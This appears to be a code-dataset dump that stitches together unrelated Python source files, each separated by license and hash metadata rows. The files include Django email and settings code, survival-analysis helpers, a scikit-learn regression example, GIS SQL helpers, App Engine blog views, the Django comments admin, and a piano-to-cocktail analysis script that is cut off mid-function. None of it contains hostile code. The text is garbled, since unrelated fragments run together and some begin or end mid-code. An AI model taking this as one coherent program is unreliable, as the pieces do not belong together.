user_name = user.first_name
book_id = book.id
url = HOST_FRONTEND + JOURNEY_LINK + str(book_id)
msg_plain = render_to_string('book_update.txt', {'platformUrl': url, 'username': user_name})
msg_html = render_to_string('book_update.html', {'platformUrl': url, 'username': user_name})
send_mail(
'Book Voyage Update',
msg_plain,
DEFAULT_FROM_EMAIL,
[user_email],
html_message=msg_html,
)
| gpl-3.0 | -5,521,015,942,578,284,000 | 30.064516 | 109 | 0.66433 | false |
spacecowboy/article-annriskgroups-source | stats.py | 1 | 3897 | # -*- coding: utf-8 -*-
import numpy as np
def surv_area(durations, events=None, absolute=False):
'''
Parameters:
durations - array of event times (must be greater than zero)
events - array of event indicators (1/True for event, 0/False for censored)
absolute - if True, returns the actual area. Otherwise, a relative value
between 0 and 1
Returns:
area - The area under the survival curve
'''
if events is None:
events = np.ones_like(durations, dtype=bool)
events = events.astype(bool)
# Unique event times
TU = np.sort(np.unique(durations[events]))
# Starting values
S = 1.0
A = 0.0
p = 0
for t in TU:
# Add box to area
A += S * (t - p)
# People at risk
R = np.sum(durations >= t)
# Deaths between previous and now
deaths = np.sum(durations[events] == t)
# Update survival
S *= (R - deaths) / R
p = t
# If we have censored beyond last event
A += S * (np.max(durations) - p)
if not absolute:
A /= np.max(durations)
return A
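def _surv_area_example():
    # Hedged usage sketch with synthetic data (not taken from the article):
    # two observed events at t=2 and t=4, one subject censored at t=5.
    durations = np.array([2.0, 4.0, 5.0])
    events = np.array([True, True, False])
    # Relative area under the Kaplan-Meier curve, roughly 0.73 here.
    return surv_area(durations, events)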
def k_fold_cross_validation(fitters, df, duration_col, event_col=None,
k=5, evaluation_measure=None, predictor="predict_median",
predictor_kwargs={}):
"""
Perform cross validation on a dataset.
fitter: A list of fitters. They will all train on the same subsets.
df: a Pandas dataframe with necessary columns `duration_col` and `event_col`, plus
other covariates. `duration_col` refers to the lifetimes of the subjects. `event_col`
        refers to whether the 'death' event was observed: 1 if observed, 0 else (censored).
duration_col: the column in dataframe that contains the subjects lifetimes.
event_col: the column in dataframe that contains the subject's death observation. If left
as None, assumes all individuals are non-censored.
k: the number of folds to perform. n/k data will be withheld for testing on.
evaluation_measure: a function that accepts either (event_times, predicted_event_times),
or (event_times, predicted_event_times, event_observed) and returns a scalar value.
Default: statistics.concordance_index: (C-index) between two series of event times
predictor: a string that matches a prediction method on the fitter instances. For example,
"predict_expectation" or "predict_percentile". Default is "predict_median"
    predictor_kwargs: keyword args to pass into predictor.
Returns:
k-length list of scores for each fold.
"""
n, d = df.shape
# Each fitter has its own scores
fitterscores = [[] for _ in fitters]
if event_col is None:
event_col = 'E'
df[event_col] = 1.
# reindex returns a copy
df = df.reindex(np.random.permutation(df.index))
df.sort(event_col, inplace=True)
assignments = np.array((n // k + 1) * list(range(1, k + 1)))
assignments = assignments[:n]
testing_columns = df.columns - [duration_col, event_col]
for i in range(1, k + 1):
ix = assignments == i
training_data = df.ix[~ix]
testing_data = df.ix[ix]
T_actual = testing_data[duration_col].values
E_actual = testing_data[event_col].values
X_testing = testing_data[testing_columns]
for fitter, scores in zip(fitters, fitterscores):
# fit the fitter to the training data
fitter.fit(training_data, duration_col=duration_col, event_col=event_col)
T_pred = getattr(fitter, predictor)(X_testing, **predictor_kwargs).values
try:
scores.append(evaluation_measure(T_actual, T_pred, E_actual))
except TypeError:
scores.append(evaluation_measure(T_actual, T_pred))
return fitterscores
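# Hedged usage sketch (assumes lifelines-style fitters, which this helper was
# written against; the imports below are illustrative and not used by this
# module):
#
#     from lifelines import CoxPHFitter
#     from lifelines.utils import concordance_index
#
#     scores = k_fold_cross_validation([CoxPHFitter()], df, duration_col='T',
#                                      event_col='E', k=5,
#                                      evaluation_measure=concordance_index)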
| gpl-3.0 | -7,565,069,649,911,503,000 | 35.083333 | 101 | 0.625353 | false |
trungnt13/scikit-learn | examples/linear_model/plot_ols.py | 220 | 1940 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
Linear Regression Example
=========================================================
This example uses only the first feature of the `diabetes` dataset, in
order to illustrate a two-dimensional plot of this regression technique. The
straight line can be seen in the plot, showing how linear regression attempts
to draw a straight line that will best minimize the residual sum of squares
between the observed responses in the dataset, and the responses predicted by
the linear approximation.
The coefficients, the residual sum of squares and the variance score are also
calculated.
"""
print(__doc__)
# Code source: Jaques Grobler
# License: BSD 3 clause
import matplotlib.pyplot as plt
import numpy as np
from sklearn import datasets, linear_model
# Load the diabetes dataset
diabetes = datasets.load_diabetes()
# Use only one feature
diabetes_X = diabetes.data[:, np.newaxis, 2]
# Split the data into training/testing sets
diabetes_X_train = diabetes_X[:-20]
diabetes_X_test = diabetes_X[-20:]
# Split the targets into training/testing sets
diabetes_y_train = diabetes.target[:-20]
diabetes_y_test = diabetes.target[-20:]
# Create linear regression object
regr = linear_model.LinearRegression()
# Train the model using the training sets
regr.fit(diabetes_X_train, diabetes_y_train)
# The coefficients
print('Coefficients: \n', regr.coef_)
# The mean square error
print("Residual sum of squares: %.2f"
% np.mean((regr.predict(diabetes_X_test) - diabetes_y_test) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f' % regr.score(diabetes_X_test, diabetes_y_test))
# Plot outputs
plt.scatter(diabetes_X_test, diabetes_y_test, color='black')
plt.plot(diabetes_X_test, regr.predict(diabetes_X_test), color='blue',
linewidth=3)
plt.xticks(())
plt.yticks(())
plt.show()
| bsd-3-clause | 1,261,405,634,912,694,300 | 27.955224 | 77 | 0.700515 | false |
trianglefraternitymtu/slack-bridge | server/settings.py | 1 | 4877 | """
Django settings for slack announcement approval project, on Heroku. For more info, see:
https://github.com/heroku/heroku-django-template
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
SECRET_KEY = os.environ['DJANGO_SECRET_KEY']
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
DEBUG = "DEBUG_MODE" in os.environ
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'channels',
'website'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'server.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'debug': True,
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# Update database configuration with $DATABASE_URL.
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, 'static'),
)
# Channel settings
CHANNEL_LAYERS = {
"default": {
"BACKEND": "asgi_redis.RedisChannelLayer",
"CONFIG": {
"hosts": [os.environ.get('REDIS_URL', 'redis://localhost:6379')],
},
"ROUTING": "server.routing.channel_routing",
},
}
# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': ('%(asctime)s [%(process)d] [%(levelname)s] ' +
'pathname=%(pathname)s lineno=%(lineno)s ' +
'funcname=%(funcName)s %(message)s'),
'datefmt': '%Y-%m-%d %H:%M:%S'
},
'simple': {
'format': '%(levelname)s %(message)s'
}
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'logging.NullHandler',
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
}
},
'loggers': {
'basicLogger': {
'handlers': ['console'],
'level': 'DEBUG',
}
}
}
| mit | -9,003,396,248,352,767,000 | 27.354651 | 91 | 0.635022 | false |
mdanielwork/intellij-community | python/lib/Lib/site-packages/django/contrib/gis/db/backends/util.py | 377 | 1749 | """
A collection of utility routines and classes used by the spatial
backends.
"""
def gqn(val):
"""
The geographic quote name function; used for quoting tables and
geometries (they use single rather than the double quotes of the
backend quotename function).
"""
if isinstance(val, basestring):
if isinstance(val, unicode): val = val.encode('ascii')
return "'%s'" % val
else:
return str(val)
class SpatialOperation(object):
"""
Base class for generating spatial SQL.
"""
sql_template = '%(geo_col)s %(operator)s %(geometry)s'
def __init__(self, function='', operator='', result='', **kwargs):
self.function = function
self.operator = operator
self.result = result
self.extra = kwargs
def as_sql(self, geo_col, geometry='%s'):
return self.sql_template % self.params(geo_col, geometry)
def params(self, geo_col, geometry):
params = {'function' : self.function,
'geo_col' : geo_col,
'geometry' : geometry,
'operator' : self.operator,
'result' : self.result,
}
params.update(self.extra)
return params
class SpatialFunction(SpatialOperation):
"""
Base class for generating spatial SQL related to a function.
"""
sql_template = '%(function)s(%(geo_col)s, %(geometry)s)'
def __init__(self, func, result='', operator='', **kwargs):
# Getting the function prefix.
default = {'function' : func,
'operator' : operator,
'result' : result
}
kwargs.update(default)
super(SpatialFunction, self).__init__(**kwargs)
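def _example_spatial_sql():
    """Hedged illustration (not used by the backends): render a function-style
    operation the way a PostGIS-like backend would."""
    contains = SpatialFunction('ST_Contains')
    # Produces: 'ST_Contains("geom", %s)'
    return contains.as_sql('"geom"', '%s')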
| apache-2.0 | -7,309,029,701,186,243,000 | 30.232143 | 70 | 0.571184 | false |
vongochung/buiquocviet | home/views.py | 1 | 11342 | # -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from django.http import Http404
from django.views.decorators.csrf import ensure_csrf_cookie
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response, redirect, HttpResponse, get_object_or_404
from django.template import RequestContext
from django.template.loader import render_to_string
from django.contrib.auth.decorators import login_required
from home.models import POST, Category, IMAGE_STORE
from datetime import datetime
from django.core.paginator import Paginator, PageNotAnInteger
from google.appengine.api import memcache
import json
from django.views.decorators.cache import cache_page
from django.db.models import Q
from home.function import MultiCookie
from google.appengine.ext import blobstore
from google.appengine.api import images
import cgi
now = datetime.now()
from settings import PAGE_SIZE
#@cache_page(60 * 5)
def index(request):
lang = request.LANGUAGE_CODE
categories = memcache.get('categories-'+lang)
if categories is None:
categories = Category.objects.all().order_by('order')
memcache.set('categories-'+lang, list(categories), 300)
paginator = Paginator(categories, PAGE_SIZE)
categories = paginator.page(1)
return render_to_response('home/index.html', {"categories":categories, "lang":lang}, context_instance=RequestContext(request))
def set_redirect(lang="vi", type_redirect_page=None, post=None, category=None):
redirect = "/"
if type_redirect_page == "xem_nhieu" and lang == "vi":
return "/most-view/"
elif type_redirect_page == "xem_nhieu" and lang == "en":
return "/xem-nhieu/"
elif type_redirect_page == "binh_luan_nhieu" and lang == "en":
return "/binh-luan-nhieu/"
elif type_redirect_page == "binh_luan_nhieu" and lang == "vi":
return "/most-comment/"
elif type_redirect_page == "detail" and lang == "en":
return "/"+post.category.slug+"/"+post.slug+"/"
elif type_redirect_page == "detail" and lang == "vi":
return "/"+post.category.slug_en+"/"+post.slug_en+"/"
elif type_redirect_page == "category" and lang == "en":
return "/"+category.slug+"/"
elif type_redirect_page == "category" and lang == "vi":
return "/"+category.slug_en+"/"
else:
return redirect
def get_posts(request):
if request.method == 'POST':
category = None
posts_list = None
page = request.POST.get('page')
if "category" in request.POST:
category = request.POST["category"]
cate= get_object_or_404(Category,slug=category)
posts_list = memcache.get('categories-%s' % category)
if posts_list is None:
posts_list = POST.objects.filter(category=cate).order_by('-date')
memcache.set('categories-%s' % category, list(posts_list), 300)
paginator = Paginator(posts_list, PAGE_SIZE)
try:
posts = paginator.page(page)
except PageNotAnInteger:
return HttpResponse(status=400)
data = {"posts":posts}
if category is not None:
data["cate_current"] = category
html = render_to_string("post/post_ajax.html", data)
serialized_data = json.dumps({"html": html})
return HttpResponse(serialized_data, mimetype='application/json')
return HttpResponse(status=400)
def get_categories(request):
if request.method == 'POST':
cate_list = None
page = request.POST.get('page')
try:
cate_list = memcache.get('categories')
if cate_list is None:
cate_list = Category.objects.all().order_by('order')
memcache.set('categories', cate_list, 300)
except:
cate_list = Category.objects.all().order_by('order')
paginator = Paginator(cate_list, PAGE_SIZE)
try:
categories = paginator.page(page)
except PageNotAnInteger:
return HttpResponse(status=400)
data = {"categories":categories}
html = render_to_string("category/category_ajax.html", data)
serialized_data = json.dumps({"html": html})
return HttpResponse(serialized_data, mimetype='application/json')
return HttpResponse(status=400)
def get_posts_detail_more(request):
if request.method == 'POST':
page = request.POST.get('page')
typeGet = request.POST.get('type')
category = request.POST["category"]
cate= get_object_or_404(Category,slug=category)
oldcookie = MultiCookie(cookie=request.COOKIES.get('viewed_post'))
list_viewed = oldcookie.values
if list_viewed is None:
list_viewed = []
if "viewed" == typeGet:
posts_list = POST.objects.filter(pk__in=list_viewed,category=cate).order_by('-date')
else:
posts_list = POST.objects.filter(~Q(pk__in=list_viewed),category=cate).order_by('-date')
paginator = Paginator(posts_list, PAGE_SIZE)
try:
posts = paginator.page(page)
except PageNotAnInteger:
return HttpResponse(status=400)
data = {"posts":posts, "type":typeGet, "lang":request.LANGUAGE_CODE}
if category is not None:
data["cate_current"] = category
html = render_to_string("post/more_post_detail.html", data)
serialized_data = json.dumps({"html": html})
return HttpResponse(serialized_data, mimetype='application/json')
return HttpResponse(status=400)
@cache_page(60 * 4)
def detail_post(request, category=None, slug=None):
post = get_object_or_404(POST, slug=slug)
post.updateView()
oldcookie = MultiCookie(cookie=request.COOKIES.get('viewed_post'))
list_viewed = oldcookie.values
if list_viewed is None:
list_viewed = [post.id]
else:
if exits_in_array(list_viewed, post.id) == False:
list_viewed.append(post.id)
categories = Category.objects.all().order_by('order')
response = render_to_response('home/detail.html', {"post":post,"categories":categories}, context_instance=RequestContext(request))
newcookie = MultiCookie(values=list_viewed)
response.set_cookie('viewed_post',value=newcookie)
return response
@cache_page(60 * 15)
def category(request, category=None):
cate= get_object_or_404(Category,slug=category)
posts_list = memcache.get(category)
if posts_list is None:
posts_list = POST.objects.filter(category=cate).order_by('-date')
memcache.set(category, list(posts_list), 300)
paginator = Paginator(posts_list, PAGE_SIZE)
posts = paginator.page(1)
return render_to_response('home/category_page.html', {"posts":posts,"cate_current":cate}, context_instance=RequestContext(request))
def get_array_field(dict_list, field):
arr_return = []
for item in dict_list:
arr_return.append(getattr(item, field))
return arr_return
def exits_in_array(dict_list, ele):
for item in dict_list:
if item == ele:
return True
return False
def category_post_relative(request, category=None):
post=request.GET["post"]
oldcookie = MultiCookie(cookie=request.COOKIES.get('viewed_post'))
list_viewed = oldcookie.values
if list_viewed is None:
list_viewed = []
if request.LANGUAGE_CODE == "vi":
cate= get_object_or_404(Category,slug=category)
else:
cate= get_object_or_404(Category,slug_en=category)
posts_list_not_view = POST.objects.filter(~Q(pk__in=list_viewed),category=cate).order_by('-date')
posts_list__viewed = POST.objects.filter(pk__in=list_viewed,category=cate).order_by('-date')
paginator = Paginator(posts_list_not_view, PAGE_SIZE)
posts_not_view = paginator.page(1)
paginator_viewed = Paginator(posts_list__viewed, PAGE_SIZE)
posts_viewed = paginator_viewed.page(1)
data = {"posts_not_view":posts_not_view, "posts_viewed":posts_viewed, "cate_current":category, "lang":request.LANGUAGE_CODE}
html = render_to_string("post/post_relative_ajax.html", data)
serialized_data = json.dumps({"html": html})
return HttpResponse(serialized_data, mimetype='application/json')
@login_required
def upload_image(request):
upload_files = get_uploads(request, field_name='file', populate_post=True) # 'file' is file upload field in the form
blob_info = upload_files[0]
image = IMAGE_STORE()
image.blob_key = blob_info.key()
image.created_date = blob_info.creation
image.size = blob_info.size
image.file_name = blob_info.filename
image.save()
return redirect(request.POST["redirect"])
def get_uploads(request, field_name=None, populate_post=False):
"""Get uploads sent to this handler.
Args:
field_name: Only select uploads that were sent as a specific field.
populate_post: Add the non blob fields to request.POST
Returns:
A list of BlobInfo records corresponding to each upload.
Empty list if there are no blob-info records for field_name.
"""
if hasattr(request,'__uploads') == False:
request.META['wsgi.input'].seek(0)
fields = cgi.FieldStorage(request.META['wsgi.input'], environ=request.META)
request.__uploads = {}
if populate_post:
request.POST = {}
for key in fields.keys():
field = fields[key]
if isinstance(field, cgi.FieldStorage) and 'blob-key' in field.type_options:
request.__uploads.setdefault(key, []).append(blobstore.parse_blob_info(field))
elif populate_post:
request.POST[key] = field.value
if field_name:
try:
return list(request.__uploads[field_name])
except KeyError:
return []
else:
results = []
for uploads in request.__uploads.itervalues():
results += uploads
return results
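# Illustrative sketch (assumption, not part of the original views): typical use
# of get_uploads() inside a Blobstore upload handler, mirroring upload_image()
# above; the variable names are hypothetical.
#   blobs = get_uploads(request, field_name='file', populate_post=True)
#   if blobs:
#       serving_url = images.get_serving_url(blobs[0].key())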
@login_required
def get_images(request):
images_list = IMAGE_STORE.objects.all().order_by('-created_date')
paginator = Paginator(images_list, PAGE_SIZE)
imagesPage = paginator.page(1)
urls = []
for blob in imagesPage:
urls.append(images.get_serving_url(blob.blob_key))
data = {"urls" : urls, "images":imagesPage}
html = render_to_string("image/image_ajax.html", data)
serialized_data = json.dumps({"html": html})
return HttpResponse(serialized_data, mimetype='application/json')
@login_required
def get_images_more(request):
if request.method == 'POST':
page = request.POST.get('page')
images_list = IMAGE_STORE.objects.all().order_by('-created_date')
paginator = Paginator(images_list, PAGE_SIZE)
try:
imagesPage = paginator.page(page)
except PageNotAnInteger:
return HttpResponse(status=400)
urls = []
for blob in imagesPage:
urls.append(images.get_serving_url(blob.blob_key))
data = {"urls" : urls, "images":imagesPage}
html = render_to_string("image/image_ajax.html", data)
serialized_data = json.dumps({"html": html})
return HttpResponse(serialized_data, mimetype='application/json')
return HttpResponse(status=400)
def commented(request):
if request.method == "POST":
post = get_object_or_404(POST, pk=request.POST["p"])
if "type" in request.POST:
post.updateComment("removed")
else:
post.updateComment()
return HttpResponse(status=200)
return HttpResponse(status=400)
def liked(request):
if request.method == "POST":
post = get_object_or_404(POST, pk=request.POST["p"])
if "type" in request.POST:
post.updateLike("unliked")
else:
post.updateLike()
return HttpResponse(status=200)
return HttpResponse(status=400)
def search(request):
""" Autocomplete search for Venue and Player API
:param request:
"""
key = u'%s' % request.GET['q']
callback = request.GET.get('callback')
cates = Category.objects.all().filter(Q(name__icontains=key))[:10]
dictionaries = [ obj.as_dict() for obj in cates ]
serialized_data = json.dumps(dictionaries)
data = '%s(%s)' % (callback, serialized_data)
return HttpResponse(data, mimetype='application/json') | bsd-3-clause | 4,577,825,283,039,295,000 | 33.688073 | 132 | 0.705784 | false |
adieu/django-nonrel | django/contrib/comments/admin.py | 361 | 3299 | from django.contrib import admin
from django.contrib.comments.models import Comment
from django.utils.translation import ugettext_lazy as _, ungettext
from django.contrib.comments import get_model
from django.contrib.comments.views.moderation import perform_flag, perform_approve, perform_delete
class CommentsAdmin(admin.ModelAdmin):
fieldsets = (
(None,
{'fields': ('content_type', 'object_pk', 'site')}
),
(_('Content'),
{'fields': ('user', 'user_name', 'user_email', 'user_url', 'comment')}
),
(_('Metadata'),
{'fields': ('submit_date', 'ip_address', 'is_public', 'is_removed')}
),
)
list_display = ('name', 'content_type', 'object_pk', 'ip_address', 'submit_date', 'is_public', 'is_removed')
list_filter = ('submit_date', 'site', 'is_public', 'is_removed')
date_hierarchy = 'submit_date'
ordering = ('-submit_date',)
raw_id_fields = ('user',)
search_fields = ('comment', 'user__username', 'user_name', 'user_email', 'user_url', 'ip_address')
actions = ["flag_comments", "approve_comments", "remove_comments"]
def get_actions(self, request):
actions = super(CommentsAdmin, self).get_actions(request)
# Only superusers should be able to delete the comments from the DB.
if not request.user.is_superuser and 'delete_selected' in actions:
actions.pop('delete_selected')
if not request.user.has_perm('comments.can_moderate'):
if 'approve_comments' in actions:
actions.pop('approve_comments')
if 'remove_comments' in actions:
actions.pop('remove_comments')
return actions
def flag_comments(self, request, queryset):
self._bulk_flag(request, queryset, perform_flag,
lambda n: ungettext('flagged', 'flagged', n))
flag_comments.short_description = _("Flag selected comments")
def approve_comments(self, request, queryset):
self._bulk_flag(request, queryset, perform_approve,
lambda n: ungettext('approved', 'approved', n))
approve_comments.short_description = _("Approve selected comments")
def remove_comments(self, request, queryset):
self._bulk_flag(request, queryset, perform_delete,
lambda n: ungettext('removed', 'removed', n))
remove_comments.short_description = _("Remove selected comments")
def _bulk_flag(self, request, queryset, action, done_message):
"""
Flag, approve, or remove some comments from an admin action. Actually
calls the `action` argument to perform the heavy lifting.
"""
n_comments = 0
for comment in queryset:
action(request, comment)
n_comments += 1
msg = ungettext(u'1 comment was successfully %(action)s.',
u'%(count)s comments were successfully %(action)s.',
n_comments)
self.message_user(request, msg % {'count': n_comments, 'action': done_message(n_comments)})
# Only register the default admin if the model is the built-in comment model
# (this won't be true if there's a custom comment app).
if get_model() is Comment:
admin.site.register(Comment, CommentsAdmin)
| bsd-3-clause | -6,407,621,922,310,696,000 | 44.191781 | 112 | 0.62231 | false |
bverdu/Pyanocktail | pyanocktail/pyanalysis.py | 1 | 31981 | # -*- coding: utf-8 -*-
# This software is free software; you can redistribute it and/or modify it under
# the terms of version 2 of GNU General Public License as published by the
# Free Software Foundation (see License.txt).
from __future__ import division
import numpy as np
# Note FJ:
# pckt file format:
# as far as I can tell we have
# column 0: event time (in ms)
# column 1: event type (0 note off, 1 note on, 5 sustain on or off)
# column 2: note pitch
# column 3: note velocity
def arggsort(data):
    # There is no direct equivalent of scilab's gsort function in numpy.
    # gsort orders the results from largest to smallest, and additionally
    # requires the order of the indices to be preserved for identical values.
    # get the values ordered from largest to smallest
ordered_data = np.sort(data)[::-1]
    # get the corresponding indices
indexes = np.argsort(data)[::-1]
    # a loop is now needed to reorder the indices
    # for identical values
    # start of the range (inclusive) over which the ordered values are
    # identical
ind_start = 0
    # end of the range (exclusive) over which the ordered values are
    # identical
ind_stop = 1
for ind in range(1, indexes.shape[0]):
if ordered_data[ind] == ordered_data[ind - 1]:
ind_stop += 1
else:
indexes[ind_start:ind_stop] = np.sort(indexes[ind_start:ind_stop])
ind_start = ind_stop
ind_stop += 1
indexes[ind_start:ind_stop] = np.sort(indexes[ind_start:ind_stop])
return indexes
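# Illustrative example (not part of the original module): for data = [3, 1, 3],
# a plain np.argsort(data)[::-1] may return [2, 0, 1] depending on tie handling,
# whereas arggsort keeps the indices of tied values in ascending order and
# returns [0, 2, 1], matching scilab's gsort convention.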
def PIANOCKTAIL(notes):
######################################
    # Open the files - lists of ON / OFF / SUSTAIN events
######################################
# piano = np.loadtxt(fname)
if isinstance(notes, list):
piano = np.array(notes)
else:
piano = np.loadtxt(notes)
l = piano.shape[0]
    # Lists of ON / OFF / SUSTAIN events
M_On = piano[piano[:, 1] == 1, :]
nbnotes_piece = M_On.shape[0]
M_Off = piano[piano[:, 1] == 0, :]
nbnoff_piece = M_Off.shape[0]
M_Sust = piano[piano[:, 1] == 5, :]
nbsust_piece = M_Sust.shape[0]
    # Convert event times from milliseconds to seconds
M_On[:, 0] = M_On[:, 0] / 1000.
M_Off[:, 0] = M_Off[:, 0] / 1000.
M_Sust[:, 0] = M_Sust[:, 0] / 1000.
######################################
    # Check the sustains: if their count is odd, add an off at the end of the piece
######################################
    # !!! FJ: careful, I have no test file containing sustain data, so
    # everything related to sustain is untested
if nbsust_piece % 2 != 0:
M_Sust = np.vstack([M_Sust, [np.max(M_Off[:, 0]), 5., 0., 0.]])
nbsust_piece = M_Sust.shape[0]
    # Split the sustains into On / Off
Sust_On = M_Sust[0::2, :]
Sust_Off = M_Sust[1::2, :]
######################################
    # Determine the end of each note
######################################
for i in np.arange(nbnotes_piece):
j = 0
while ((M_Off[j, 2] != M_On[i, 2]) or (M_Off[j, 0] < M_On[i, 0])) \
and (j < nbnoff_piece - 1):
j += 1
M_On[i, 1] = M_Off[j, 0]
M_Off[j, 2] = 0.
del M_Off
del piano
note_piece = np.zeros([nbnotes_piece, 7])
note_piece[:, 3] = M_On[:, 2]
note_piece[:, 4] = M_On[:, 3]
note_piece[:, 5] = M_On[:, 0]
note_piece[:, 6] = M_On[:, 1] - M_On[:, 0]
del M_On
size_piece = note_piece.shape
nbnotes_piece = size_piece[0]
# Duration of the piece in seconds:
t_piece = np.max(note_piece[:, 5])
duree = t_piece
# Density of notes (notes/seconds):
densite = nbnotes_piece / t_piece
    # Attacks:
    # !!! FJ: isn't an index missing on note_piece in np.mean(note_piece))^(1/3)?
    # YES: add [:,4]
    # !!! FJ: scilab returns 0 for stdev when given a single value
    # (i.e. there is only one note in the piece), numpy returns nan
    # -> I add a test
if note_piece.shape[0] == 1:
Enervement = np.mean(note_piece[:, 4]) * 0.1**(1. / 3.) * 1.1
else:
Enervement = np.mean(note_piece[:, 4]) * \
(0.1 + 1.0 * (np.std(note_piece[:, 4], ddof=1)) / np.mean(note_piece[:, 4]))**(1. / 3.) \
* 1.1
metrique = METRIQUE(note_piece)
tonalite = TONALITE(note_piece)
tempo = TEMPO(note_piece)
    # Complexity:
    # !!! FJ: is the trailing comment intentional?
    # YES it is intentional
Complexite = (densite * 60 / tempo)**1.2 # *densite**0.3
    # Sadness of the piece
    # 45 points for the tempo, a bonus of 40 if the key is minor, a bonus of 15 if the meter is duple
    # !!! FJ: why is there a max here?
    # YES it is intentional !!!
tristesse = max(45 * (1 - tempo / 150) + 40 *
np.floor(tonalite / 13.), 0) + 15 * (1 - np.floor(metrique / 3.))
cocktail = RECETTE(duree, Complexite, tonalite, tempo)
return (duree, tristesse, Enervement, Complexite, metrique, tonalite, tempo, cocktail)
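# Worked example for the sadness score above (illustrative values, not from a
# real .pckt file): with tempo = 100, a minor key (tonalite = 15) and a duple
# meter (metrique = 2):
#   45 * (1 - 100/150) = 15, + 40 (minor key) = 55, + 15 (duple) -> tristesse = 70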
def RECETTE(duree, complexite, tonalite, tempo):
    # Here we decide what goes into the glass!
crit_duree = [0., 10., 30., 90., 180.]
crit_tempo = [50, 80, 120]
alcfort = ['alc01 ', 'alc02 ', 'alc03 ', 'alc04 ', 'alc05 ', 'alc06 ',
'alc07 ', 'alc08 ', 'alc09 ', 'alc10 ', 'alc11 ', 'alc12 ']
sodamaj = ['sj1 ', 'sj2 ', 'sj3 ', 'sj4 ']
sodamin = ['sn1 ', 'sn2 ', 'sn3 ', 'sn4 ']
complicado = ['tralala ']
recette = []
    # CHOICE OF THE SPIRIT (key)
recette.append(alcfort[(tonalite - 1) % 12])
    # AMOUNT OF SPIRIT (duration of the piece)
    # !!! FJ: these loops should be rewritten more generically
    # with operations on the arrays directly
if ((crit_duree[0] < duree) and (duree <= crit_duree[1])):
recette.append('0 ')
elif ((crit_duree[1] < duree) and (duree <= crit_duree[2])):
recette.append('1 ')
elif ((crit_duree[2] < duree) and (duree <= crit_duree[3])):
recette.append('2 ')
elif ((crit_duree[3] < duree) and (duree <= crit_duree[4])):
recette.append('3 ')
elif (duree > crit_duree[4]):
recette.append('4 ')
    # CHOICE OF THE SODA
    # Pre-splitting of the soda list: major - minor
    # !!! FJ: we should check how the key is encoded, but if values 1 to 12
    # are major, then there is an error here because 12 was recognized as
    # minor; and is the else branch ever supposed to happen?
    # YES, it had to be fixed -> I replaced tonalite with tonalite-1
    # bug_6.pckt hits a case where the key is 24, which caused a problem
    # with the uncorrected code
if np.floor((tonalite - 1) / 12.) == 0.:
soda = sodamaj
elif np.floor((tonalite - 1) / 12.) == 1.:
soda = sodamin
else:
soda = []
    # CHOICE OF THE SODA
    # Pick the soda itself
if (tempo < crit_tempo[0]):
recette.append(soda[0])
recette.append('3 ')
elif ((crit_tempo[0] < tempo) and (tempo <= crit_tempo[1])):
recette.append(soda[1])
recette.append('3 ')
elif ((crit_tempo[1] < tempo) and (tempo <= crit_tempo[2])):
recette.append(soda[2])
recette.append('3 ')
elif ((crit_tempo[2] < tempo)):
recette.append(soda[3])
recette.append('3 ')
    # THE LITTLE TOUCH OF VIRTUOSITY - IT MIGHT BE GOOD
if complexite > 0.7:
recette.append(complicado[0])
recette.append('1 ')
